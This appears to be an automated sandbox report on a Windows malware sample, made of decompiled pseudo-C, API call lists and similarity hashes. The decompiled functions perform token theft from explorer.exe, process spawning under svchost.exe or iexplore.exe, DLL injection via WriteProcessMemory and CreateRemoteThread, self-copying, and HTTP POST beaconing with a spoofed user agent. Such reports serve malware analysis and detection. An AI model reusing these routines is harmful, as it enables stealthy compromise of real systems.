						__eflags = _t11 - 2;
						if(_t11 == 2) {
							L22:
							if(_v8 != 0) {
								CloseHandle(_v8);
							}
							ExitProcess(0);
						}
						__eflags = _t36;
						if(_t36 != 0) {
							L16:
							 *0x4050c8 = CreateEventA(0, 0, 0, 0);
							L17:
							_t33 = CreateThread(0, 0, E00402C05, 0, 0,  &_v4);
							__eflags = _t33;
							if(_t33 != 0) {
								_t17 =  *0x4050c8; // 0x0
								__eflags = _t17;
								if(_t17 != 0) {
									WaitForSingleObject(_t17, 0xffffffff);
									CloseHandle( *0x4050c8);
									 *0x4050c8 = 0;
								}
								WaitForSingleObject(_t33, 0xffffffff);
								CloseHandle(_t33);
							}
							L21:
							E00402FA0(_t30, 0);
							goto L22;
						}
						__eflags = _t11 - 0xffffffff;
						if(_t11 != 0xffffffff) {
							goto L17;
						}
						goto L16;
					}
					__eflags = _t36;
					if(_t36 != 0) {
						goto L16;
					}
					E00401626();
					goto L22;
				}
				_t23 =  *0x4050b4; // 0x1d6000
				 *0x405048 = 0;
				_t46 =  *((intOrPtr*)(_t23 + 0x28));
				if( *((intOrPtr*)(_t23 + 0x28)) != 0) {
					 *0x40506c = 1;
					SetStdHandle(0xfffffff6, _v8);
					goto L10;
				}
				 *0x40506c = 2;
				_t34 = E00402DE5(0, _t31, _t36, _t46);
				_t26 =  *0x4050b4; // 0x1d6000
				 *(_t26 + 0x28) = 1;
				_t27 = E00403094(0, _t30, _t34, _t36, _t46, _t34);
				asm("sbb esi, esi");
				_t36 = 1 +  ~_t27;
				if(_t34 != 0) {
					CloseHandle(_t34);
				}
				if(_t36 != 0) {
					goto L10;
				} else {
					goto L21;
				}
			}


















0x0040335c
0x00403364
0x0040336a
0x0040336f
0x00403375
0x00403375
0x0040337d
0x00403386
0x0040338a
0x00403395
0x00403399
0x004033fb
0x004033fb
0x00403400
0x00403402
0x0040340f
0x00403412
0x00403476
0x0040347c
0x00403482
0x00403482
0x00403485
0x00403485
0x00403414
0x00403416
0x0040341d
0x00403427
0x0040342c
0x00403440
0x00403442
0x00403444
0x00403446
0x0040344b
0x00403453
0x00403458
0x00403460
0x00403462
0x00403462
0x0040346b
0x0040346e
0x0040346e
0x00403470
0x00403471
0x00000000
0x00403471
0x00403418
0x0040341b
0x00000000
0x00000000
0x00000000
0x0040341b
0x00403404
0x00403406
0x00000000
0x00000000
0x00403408
0x00000000
0x00403408
0x0040339b
0x004033a0
0x004033a6
0x004033a9
0x004033e9
0x004033f5
0x00000000
0x004033f5
0x004033ab
0x004033ba
0x004033bc
0x004033c2
0x004033c9
0x004033d2
0x004033d4
0x004033d7
0x004033da
0x004033da
0x004033de
0x00000000
0x004033e0
0x00000000
0x004033e0

APIs
  • GetVersion.KERNEL32 ref: 0040335C
  • GetStdHandle.KERNEL32(000000F4), ref: 00403380
    • Part of subcall function 00402A43: LoadLibraryA.KERNEL32(?), ref: 00402A6F
    • Part of subcall function 00402A43: GetCurrentProcessId.KERNEL32 ref: 00402AA1
  • SetStdHandle.KERNEL32(000000F6,?), ref: 004033F5
    • Part of subcall function 00402DE5: LoadLibraryA.KERNEL32(ntdll.dll), ref: 00402E03
    • Part of subcall function 00402DE5: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E22
    • Part of subcall function 00402DE5: GetProcAddress.KERNEL32(00000000,_wcsicmp,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E35
    • Part of subcall function 00402DE5: LocalAlloc.KERNEL32(00000040,00010000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E4A
    • Part of subcall function 00402DE5: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E6D
    • Part of subcall function 00402DE5: OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,?,?,00401448,00000028), ref: 00402EAC
    • Part of subcall function 00402DE5: OpenProcessToken.ADVAPI32(00000000,000200FF,?,?,?,?,?,?,?,00401448,00000028), ref: 00402EC5
    • Part of subcall function 00402DE5: CloseHandle.KERNEL32(00000000), ref: 00402ECC
    • Part of subcall function 00402DE5: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402EF5
    • Part of subcall function 00402DE5: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402F04
    • Part of subcall function 00403094: GetCurrentProcessId.KERNEL32(00401410,00000184,00403308,00000000,00000001,00000113,?,?,00402421), ref: 004030B4
    • Part of subcall function 00403094: OpenProcess.KERNEL32(001F0FFF,00000001,00000000,?,?,00402421), ref: 004030C1
    • Part of subcall function 00403094: DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,00000000,?,00000104), ref: 00403151
    • Part of subcall function 00403094: SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004), ref: 00403169
    • Part of subcall function 00403094: CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 00403197
    • Part of subcall function 00403094: CloseHandle.KERNEL32(00000000), ref: 004031A8
    • Part of subcall function 00403094: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,?,00000000,00000000,?,?), ref: 004031C8
    • Part of subcall function 00403094: TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 0040322D
    • Part of subcall function 00403094: CloseHandle.KERNEL32(?), ref: 00403236
    • Part of subcall function 00403094: CloseHandle.KERNEL32(?), ref: 00403247
    • Part of subcall function 00403094: CreateThread.KERNEL32(00000000,00000000,Function_00002965,?,00000000,?), ref: 0040326D
    • Part of subcall function 00403094: SetStdHandle.KERNEL32(000000F6,00000000), ref: 0040327B
  • CloseHandle.KERNEL32(00000000), ref: 004033DA
  • ExitProcess.KERNEL32 ref: 00403485
    • Part of subcall function 00401626: StartServiceCtrlDispatcherA.ADVAPI32(00405034,0040340D), ref: 0040162B
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403421
  • CreateThread.KERNEL32(00000000,00000000,Function_00002C05,00000000,00000000,?), ref: 0040343A
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403458
  • CloseHandle.KERNEL32 ref: 00403460
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040346B
  • CloseHandle.KERNEL32(00000000), ref: 0040346E
  • CloseHandle.KERNEL32(?), ref: 00403482
Memory Dump Source
  • Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
  • Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
  • Associated: 00000001.00000002.260196655.00407000.00000002.sdmp

Similar Non-Executed Functions

Similarity
  • Total matches: 6
  • API ID: GetProcAddressLocalFree$CloseHandleFreeLibraryLoadLibraryLocalAllocOpenProcessOpenProcessToken
  • String ID: NtQuerySystemInformation$_wcsicmp$[FILE]$[FILE]
  • API String ID: 871439847-2760969069
  • Opcode ID: 79303f3461f55357ea3caebb2c463ba2263ea78e754b615967e539c6771ee5b5
  • Instruction ID: d143e7d7f0a7e528b80bb3ef837344cc21e5cd4fbee9c201c5a4592c151db2c3
  • Opcode Fuzzy Hash: 48F04686904A97F1E623B9C8196D36164553FA17C8E0D8631B21038912B7AF322A7F80
  • Instruction Fuzzy Hash: d143e7d7f0a7e528b80bb3ef837344cc21e5cd4fbee9c201c5a4592c151db2c3
C-Code - Quality: 96%
			E001D2DE5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t37;
				void* _t38;
				intOrPtr _t40;
				void _t41;
				int _t42;
				struct HINSTANCE__* _t49;
				void* _t50;
				long _t54;
				void* _t58;
				void* _t59;
				void* _t60;

				_push(0x28);
				_push(0x1d1448);
				E001D1637(__ebx, __edi, __esi);
				 *(_t60 - 0x1c) =  *(_t60 - 0x1c) & 0x00000000;
				_t54 = 0x10000;
				 *(_t60 - 0x24) =  *(_t60 - 0x24) & 0x00000000;
				_t49 = LoadLibraryA("ntdll.dll");
				 *(_t60 - 0x20) = _t49;
				if(_t49 == 0) {
					L17:
					if( *(_t60 - 0x20) != 0) {
						FreeLibrary( *(_t60 - 0x20));
					}
					if( *(_t60 - 0x1c) != 0) {
						LocalFree( *(_t60 - 0x1c));
					}
					return E001D173E( *(_t60 - 0x24));
				}
				_t36 = GetProcAddress(_t49, "NtQuerySystemInformation");
				 *(_t60 - 0x28) = _t36;
				if(_t36 == 0) {
					goto L17;
				}
				_t37 = GetProcAddress(_t49, "_wcsicmp");
				 *(_t60 - 0x2c) = _t37;
				if(_t37 == 0) {
					goto L17;
				}
				while(1) {
					_t38 = LocalAlloc(0x40, _t54);
					 *(_t60 - 0x1c) = _t38;
					if(_t38 == 0) {
						goto L17;
					}
					_t50 =  *(_t60 - 0x28)(5, _t38, _t54, 0);
					if(_t50 != 0xc0000004) {
						if(_t50 < 0) {
							goto L17;
						}
						L8:
						if(_t50 == 0xc0000004) {
							continue;
						}
						_t58 =  *(_t60 - 0x1c);
						 *(_t60 - 4) =  *(_t60 - 4) & 0x00000000;
						while(1) {
							_t40 =  *((intOrPtr*)(_t58 + 0x3c));
							 *((intOrPtr*)(_t60 - 0x30)) = _t40;
							if(_t40 == 0) {
								goto L14;
							}
							_t42 =  *(_t60 - 0x2c)(_t40, L"explorer.exe");
							if(_t42 != 0) {
								goto L14;
							}
							_t59 = OpenProcess(0x410, _t42,  *(_t58 + 0x44));
							 *(_t60 - 0x34) = _t59;
							if(_t59 != 0) {
								OpenProcessToken(_t59, 0x200ff, _t60 - 0x24);
								CloseHandle(_t59);
							}
							L16:
							 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
							goto L17;
							L14:
							_t41 =  *_t58;
							if(_t41 == 0) {
								goto L16;
							}
							_t58 = _t58 + _t41;
							 *(_t60 - 0x38) = _t58;
						}
					}
					LocalFree( *(_t60 - 0x1c));
					 *(_t60 - 0x1c) =  *(_t60 - 0x1c) & 0x00000000;
					_t54 = _t54 + _t54;
					goto L8;
				}
				goto L17;
			}















0x001d2de5
0x001d2de7
0x001d2dec
0x001d2df1
0x001d2df5
0x001d2dfa
0x001d2e09
0x001d2e0b
0x001d2e10
0x001d2eec
0x001d2ef0
0x001d2ef5
0x001d2ef5
0x001d2eff
0x001d2f04
0x001d2f04
0x001d2f12
0x001d2f12
0x001d2e22
0x001d2e24
0x001d2e29
0x00000000
0x00000000
0x001d2e35
0x001d2e37
0x001d2e3c
0x00000000
0x00000000
0x001d2e47
0x001d2e4a
0x001d2e50
0x001d2e55
0x00000000
0x00000000
0x001d2e64
0x001d2e68
0x001d2e7d
0x00000000
0x00000000
0x001d2e7f
0x001d2e81
0x00000000
0x00000000
0x001d2e83
0x001d2e86
0x001d2e8a
0x001d2e8a
0x001d2e8d
0x001d2e92
0x00000000
0x00000000
0x001d2e9a
0x001d2ea1
0x00000000
0x00000000
0x001d2eb2
0x001d2eb4
0x001d2eb9
0x001d2ec5
0x001d2ecc
0x001d2ecc
0x001d2ee8
0x001d2ee8
0x00000000
0x001d2ed4
0x001d2ed4
0x001d2ed8
0x00000000
0x00000000
0x001d2eda
0x001d2edc
0x001d2edc
0x001d2e8a
0x001d2e6d
0x001d2e73
0x001d2e77
0x00000000
0x001d2e77
0x00000000

APIs
  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 001D2E03
  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E22
  • GetProcAddress.KERNEL32(00000000,_wcsicmp,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E35
  • LocalAlloc.KERNEL32(00000040,00010000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E4A
  • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E6D
  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2EAC
  • OpenProcessToken.ADVAPI32(00000000,000200FF,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2EC5
  • CloseHandle.KERNEL32(00000000), ref: 001D2ECC
  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2EF5
  • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2F04
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 5
  • API ID: FreeLibraryGetProcAddressLoadLibraryinet_ntoawsprintf
  • String ID: N$%s: 0$Mozilla/4.0 (compatible; MSIE 6.0;)$POST$TagId$[FILE]
  • API String ID: 3761191649-3458657377
  • Opcode ID: 2aee25d4d97340da8d57a5187acebaa494bf19f8195fcf1f0a5fcee18dc65b62
  • Instruction ID: 5c5cc2a2a5d0c80c85ef90c9e54d4eb75811ab3963221f16da9f65b959107efc
  • Opcode Fuzzy Hash: 3CF04C85081F07F5FC33A941245D77DE780BF95AC2DCCF9155622D6A235A4D32189741
  • Instruction Fuzzy Hash: 5c5cc2a2a5d0c80c85ef90c9e54d4eb75811ab3963221f16da9f65b959107efc
C-Code - Quality: 94%
			E001D2CC7(_Unknown_base(*)()** _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8;
				char _v40;
				signed int _t30;
				_Unknown_base(*)()* _t32;
				signed int _t34;
				signed int _t35;
				intOrPtr* _t36;
				signed int _t43;
				void* _t51;
				signed int* _t54;

				_v8 = 0x4e20;
				_t30 = LoadLibraryA("wininet.dll");
				_t54 = _a4;
				_t54[0xd] = _t30;
				if(_t30 != 0) {
					_a4 =  &(_t54[3]);
					_t51 = 0;
					while(1) {
						_t6 = _t51 + 0x1d500c; // 0x1d12c8
						_t32 = GetProcAddress(_t54[0xd],  *_t6);
						 *_a4 = _t32;
						if(_t32 == 0) {
							break;
						}
						_a4 =  &(_a4[1]);
						_t51 = _t51 + 4;
						if(_t51 < 0x28) {
							continue;
						}
						_t35 = _t54[3]("Mozilla/4.0 (compatible; MSIE 6.0;)", 0, 0, 0, 0);
						 *_t54 = _t35;
						if(_t35 != 0) {
							if(_a16 != 0) {
								_t36 = _a12;
								_push( *_t36);
								L001D3826();
							} else {
								_t36 = _a8;
							}
							_t35 = _t54[4]( *_t54, _t36, 0x50, 0x1d1369, 0x1d1369, 3, 0, 0);
							_t54[1] = _t35;
							if(_t35 == 0) {
								goto L6;
							} else {
								_t35 = _t54[9](_t35, "POST", 0x1d1369, 0, 0, 0, 0x84400100, 0);
								_t54[2] = _t35;
								if(_t35 == 0) {
									goto L6;
								}
								_t54[5](_t35, 2,  &_v8, 4);
								_t54[5](_t54[2], 5,  &_v8, 4);
								wsprintfA( &_v40, "%s: 0\r\n", "TagId");
								_t43 = _t54[7](_t54[2],  &_v40, 0xffffffff, 0, 0);
								asm("sbb eax, eax");
								_t34 = ( ~_t43 & 0x00000002) - 1;
								L14:
								return _t34;
							}
						}
						L6:
						_t34 = _t35 | 0xffffffff;
						goto L14;
					}
					FreeLibrary(_t54[0xd]);
					_t54[0xd] = 0;
					_t34 = 0;
					goto L14;
				}
				return _t30 | 0xffffffff;
			}













0x001d2cd4
0x001d2cdb
0x001d2ce1
0x001d2ce8
0x001d2ceb
0x001d2cf9
0x001d2cfc
0x001d2cfe
0x001d2cfe
0x001d2d07
0x001d2d12
0x001d2d14
0x00000000
0x00000000
0x001d2d16
0x001d2d1a
0x001d2d20
0x00000000
0x00000000
0x001d2d2b
0x001d2d30
0x001d2d32
0x001d2d52
0x001d2d59
0x001d2d5c
0x001d2d5e
0x001d2d54
0x001d2d54
0x001d2d54
0x001d2d73
0x001d2d78
0x001d2d7b
0x00000000
0x001d2d7d
0x001d2d8d
0x001d2d92
0x001d2d95
0x00000000
0x00000000
0x001d2da0
0x001d2dae
0x001d2dbf
0x001d2dd3
0x001d2dd8
0x001d2ddd
0x001d2dde
0x00000000
0x001d2dde
0x001d2d7b
0x001d2d34
0x001d2d34
0x00000000
0x001d2d34
0x001d2d3f
0x001d2d45
0x001d2d48
0x00000000
0x001d2d48
0x00000000

APIs
  • LoadLibraryA.KERNEL32(wininet.dll), ref: 001D2CDB
  • GetProcAddress.KERNEL32(001D12C8,001D12C8), ref: 001D2D07
  • FreeLibrary.KERNEL32(?), ref: 001D2D3F
  • inet_ntoa.WSOCK32(?), ref: 001D2D5E
  • wsprintfA.USER32 ref: 001D2DBF
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CloseHandle$CreateProcessCreateProcessAsUserCreateThreadDuplicateTokenExGetCurrentProcessIdOpenProcessSetStdHandleSetTokenInformationTerminateProcess
  • String ID:
  • API String ID: 3127335161-0
  • Opcode ID: d2529c531e04d4ae067d5c82a3609593e1c0a8b50e4b57957b408f9e477c39a1
  • Instruction ID: 52d5a6e819d562572e733741dd7379ddee707760d2556d7286c866b6ac08418f
  • Opcode Fuzzy Hash: D411598B4588D5B3C8C3B9583C0AB24D4A1EF4A9E5CAD6325B0B9596C44B49390ADF89
  • Instruction Fuzzy Hash: 52d5a6e819d562572e733741dd7379ddee707760d2556d7286c866b6ac08418f
C-Code - Quality: 96%
			E001D3094(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t101;
				intOrPtr _t103;
				void* _t109;
				void* _t112;
				struct _STARTUPINFOA _t116;
				void** _t117;
				void* _t120;

				_t112 = __ecx;
				_push(0x184);
				_push(0x1d1410);
				E001D1637(__ebx, __edi, __esi);
				 *(_t120 - 0x1c) = 0;
				 *((intOrPtr*)(_t120 - 0x38)) = 0;
				 *((intOrPtr*)(_t120 - 0x3c)) = 1;
				 *(_t120 - 4) = 0;
				_t109 = OpenProcess(0x1f0fff, 1, GetCurrentProcessId());
				 *((intOrPtr*)(_t120 - 0x40)) = _t109;
				if(_t109 == 0) {
					goto L28;
				} else {
					_t116 = 0x44;
					E001D384D(_t120 - 0x90, 0, 1);
					 *(_t120 - 0x90) = _t116;
					 *((short*)(_t120 - 0x60)) = 0;
					 *((intOrPtr*)(_t120 - 0x64)) = 0x181;
					 *((intOrPtr*)(_t120 - 0x50)) = _t109;
					while(1) {
						 *(_t120 - 0x24) = 0;
						if( *((intOrPtr*)(_t120 - 0x3c)) == 0 || E001D3734(_t112, _t120 - 0x194, 0x104) == 0) {
							E001D2B08(_t120 - 0x194, 1);
						} else {
							 *(_t120 - 0x24) = 4;
						}
						if( *(_t120 + 8) == 0) {
							goto L12;
						}
						_t117 = _t120 + 8;
						 *(_t120 - 0x48) = _t117;
						 *(_t120 - 0x20) = 0;
						if(DuplicateTokenEx( *(_t120 + 8), 0x2000000, 0, 0, 1, _t120 - 0x20) != 0) {
							 *(_t120 - 0x44) = 0;
							if(SetTokenInformation( *(_t120 - 0x20), 0xc, _t120 - 0x44, 4) != 0) {
								_t117 = _t120 - 0x20;
								 *(_t120 - 0x48) = _t117;
							}
						}
						 *(_t120 - 0x1c) = CreateProcessAsUserA( *_t117, 0, _t120 - 0x194, 0, 0, 1,  *(_t120 - 0x24), 0, 0, _t120 - 0x90, _t120 - 0x34);
						if( *(_t120 - 0x20) != 0) {
							CloseHandle( *(_t120 - 0x20));
						}
						L13:
						if(( *(_t120 - 0x24) & 0x00000004) == 0) {
							L23:
							__eflags =  *(_t120 - 0x1c);
							if( *(_t120 - 0x1c) == 0) {
								L26:
								SetStdHandle(0xfffffff6, 0);
								E001D2965(0,  *(_t120 - 0x34));
								 *(_t120 - 0x34) = 0;
								L28:
								_t66 = _t120 - 4;
								 *_t66 =  *(_t120 - 4) | 0xffffffff;
								__eflags =  *_t66;
								E001D32B0(0);
								return E001D173E( *(_t120 - 0x1c));
							}
							L24:
							__eflags =  *0x1d506c; // 0x0
							if(__eflags != 0) {
								goto L26;
							}
							 *((intOrPtr*)(_t120 - 0x38)) = CreateThread(0, 0, E001D2965,  *(_t120 - 0x34), 0, _t120 - 0x4c);
							goto L28;
						}
						if( *(_t120 - 0x1c) == 0) {
							L18:
							if( *((intOrPtr*)(_t120 - 0x3c)) == 0) {
								goto L23;
							}
							 *((intOrPtr*)(_t120 - 0x3c)) = 0;
							if( *(_t120 - 0x34) != 0) {
								TerminateProcess( *(_t120 - 0x34), 0);
								CloseHandle( *(_t120 - 0x34));
								 *(_t120 - 0x34) = 0;
							}
							if( *(_t120 - 0x30) != 0) {
								CloseHandle( *(_t120 - 0x30));
								 *(_t120 - 0x30) = 0;
							}
							continue;
						}
						E001D2B08(_t120 - 0x194, 0);
						_t101 = E001D3683(_t112, _t120 - 0x194,  *(_t120 - 0x34), 0);
						 *(_t120 - 0x1c) = _t101;
						if(_t101 != 0) {
							_t103 =  *0x1d50b4; // 0x0
							E001D3020(_t112,  *(_t120 - 0x34),  *((intOrPtr*)(_t103 + 0x34)), 0, 0, _t120 - 0x1c, 0);
						}
						if( *(_t120 - 0x1c) != 0) {
							goto L24;
						} else {
							goto L18;
						}
						L12:
						 *(_t120 - 0x1c) = CreateProcessA(0, _t120 - 0x194, 0, 0, 1,  *(_t120 - 0x24), 0, 0, _t120 - 0x90, _t120 - 0x34);
						goto L13;
					}
				}
			}










0x001d3094
0x001d3094
0x001d3099
0x001d309e
0x001d30a5
0x001d30a8
0x001d30ae
0x001d30b1
0x001d30c7
0x001d30c9
0x001d30ce
0x00000000
0x001d30d4
0x001d30d6
0x001d30e0
0x001d30e5
0x001d30eb
0x001d30ef
0x001d30f6
0x001d30ff
0x001d30ff
0x001d3105
0x001d312e
0x001d311c
0x001d311c
0x001d311c
0x001d3136
0x00000000
0x00000000
0x001d3138
0x001d313b
0x001d313e
0x001d3159
0x001d315b
0x001d3171
0x001d3173
0x001d3176
0x001d3176
0x001d3171
0x001d319d
0x001d31a3
0x001d31a8
0x001d31a8
0x001d31d1
0x001d31d5
0x001d3251
0x001d3251
0x001d3254
0x001d3278
0x001d327b
0x001d3284
0x001d3289
0x001d3294
0x001d3294
0x001d3294
0x001d3294
0x001d3298
0x001d32a5
0x001d32a5
0x001d3256
0x001d3256
0x001d325c
0x00000000
0x00000000
0x001d3273
0x00000000
0x001d3273
0x001d31da
0x001d321c
0x001d321f
0x00000000
0x00000000
0x001d3221
0x001d3227
0x001d322d
0x001d3236
0x001d3238
0x001d3238
0x001d323e
0x001d3247
0x001d3249
0x001d3249
0x00000000
0x001d323e
0x001d31e4
0x001d31f4
0x001d31f9
0x001d31fe
0x001d3207
0x001d3212
0x001d3212
0x001d321a
0x00000000
0x00000000
0x00000000
0x00000000
0x001d31ac
0x001d31ce
0x00000000
0x001d31ce
0x001d30ff

APIs
  • GetCurrentProcessId.KERNEL32(001D1410,00000184,001D3308,00000000,00000001,00000113,?,?,001D2421), ref: 001D30B4
  • OpenProcess.KERNEL32(001F0FFF,00000001,00000000,?,?,001D2421), ref: 001D30C1
    • Part of subcall function 001D3734: GetEnvironmentVariableA.KERNEL32(SystemRoot,?,?,00000044,00000000,?,?,?,001D3118,?,00000104), ref: 001D3751
    • Part of subcall function 001D3734: lstrcatA.KERNEL32(?,\System32\svchost.exe,?,?,?,001D3118,?,00000104), ref: 001D3763
    • Part of subcall function 001D3734: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe,?), ref: 001D377C
    • Part of subcall function 001D3734: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,001D3118,?,00000104), ref: 001D3799
    • Part of subcall function 001D3734: RegCloseKey.ADVAPI32(?,?,?,?,001D3118,?,00000104), ref: 001D37A9
    • Part of subcall function 001D2B08: GetModuleFileNameA.KERNEL32(?,00000104), ref: 001D2B23
    • Part of subcall function 001D2B08: lstrcpyA.KERNEL32(?,?,00000044,00000000,76E1EA18), ref: 001D2B59
    • Part of subcall function 001D2B08: lstrlenA.KERNEL32(?), ref: 001D2B5C
    • Part of subcall function 001D2B08: lstrcmpiA.KERNEL32(-00000003,001D11C8), ref: 001D2B6A
    • Part of subcall function 001D2B08: lstrcpyA.KERNEL32(-00000003,001D11C8), ref: 001D2B7C
    • Part of subcall function 001D2B08: CopyFileA.KERNEL32(?,?,00000000), ref: 001D2B89
    • Part of subcall function 001D2B08: CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001D2BA0
    • Part of subcall function 001D2B08: SetFilePointer.KERNEL32(00000000,00000092,00000000,00000000), ref: 001D2BDF
    • Part of subcall function 001D2B08: WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 001D2BF1
    • Part of subcall function 001D2B08: CloseHandle.KERNEL32(00000000), ref: 001D2BF8
  • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,00000000,?,00000104), ref: 001D3151
  • SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004), ref: 001D3169
  • CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 001D3197
  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,?,00000000,00000000,?,?), ref: 001D31C8
    • Part of subcall function 001D3683: VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,?,00000000,76E1EA18,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D369D
    • Part of subcall function 001D3683: lstrlenA.KERNEL32(?,00000000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36AE
    • Part of subcall function 001D3683: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36BB
    • Part of subcall function 001D3683: VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36E3
  • CloseHandle.KERNEL32(00000000), ref: 001D31A8
    • Part of subcall function 001D3020: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,001D2421,00000000,00000000), ref: 001D3045
    • Part of subcall function 001D3020: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 001D3070
    • Part of subcall function 001D3020: GetExitCodeThread.KERNEL32(?,?,?,?,?,001D36DB,?,00000000,001D2421,00000000,00000001,?,?,001D31F9,?,?), ref: 001D307E
    • Part of subcall function 001D3020: CloseHandle.KERNEL32(?), ref: 001D3087
  • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 001D322D
  • CloseHandle.KERNEL32(?), ref: 001D3236
  • CloseHandle.KERNEL32(?), ref: 001D3247
  • CreateThread.KERNEL32(00000000,00000000,Function_00002965,?,00000000,?), ref: 001D326D
  • SetStdHandle.KERNEL32(000000F6,00000000), ref: 001D327B
    • Part of subcall function 001D2965: SetStdHandle.KERNEL32(000000F4,?,00000000,001D3289,?), ref: 001D296D
    • Part of subcall function 001D2965: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D2976
    • Part of subcall function 001D2965: CloseHandle.KERNEL32(?), ref: 001D297D
    • Part of subcall function 001D32B0: CloseHandle.KERNEL32(?), ref: 001D32C2
    • Part of subcall function 001D32B0: CloseHandle.KERNEL32(?), ref: 001D32CC
    • Part of subcall function 001D32B0: CloseHandle.KERNEL32(?), ref: 001D32D6
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 3
  • API ID: VirtualAllocExVirtualFreeExWriteProcessMemorylstrlen
  • String ID: !$@
  • API String ID: 677720824-1106925043
  • Opcode ID: 48e15aef3bb8d9777781a255bb2fadf36b491b6b4ce89551302cf184b035be13
  • Instruction ID: d38df066d98dcb4c3f7fb2d5acdc6ed02fbc6297c1945d0034f45a0cc7f25a00
  • Opcode Fuzzy Hash: 1ED0A7C0494E42C1C125A5022CE13A7E244EF0129ECED037079802B6EFBF42313DEF0A
  • Instruction Fuzzy Hash: d38df066d98dcb4c3f7fb2d5acdc6ed02fbc6297c1945d0034f45a0cc7f25a00
C-Code - Quality: 88%
			E00403683(void* __ecx, void* _a4, void* _a8, char _a12) {
				signed int _v8;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t22 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4);
				if(_t22 != 0) {
					if(WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0) != 0) {
						_t7 =  &_a12; // 0x402421
						E00403020(_t20, _t18, __imp__LoadLibraryA, _t22,  *_t7,  &_v8, 1);
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}






0x00403683
0x00403686
0x00403687
0x0040368c
0x004036a3
0x004036a7
0x004036c3
0x004036cb
0x004036d6
0x004036d6
0x004036e3
0x004036e3
0x004036f0

APIs
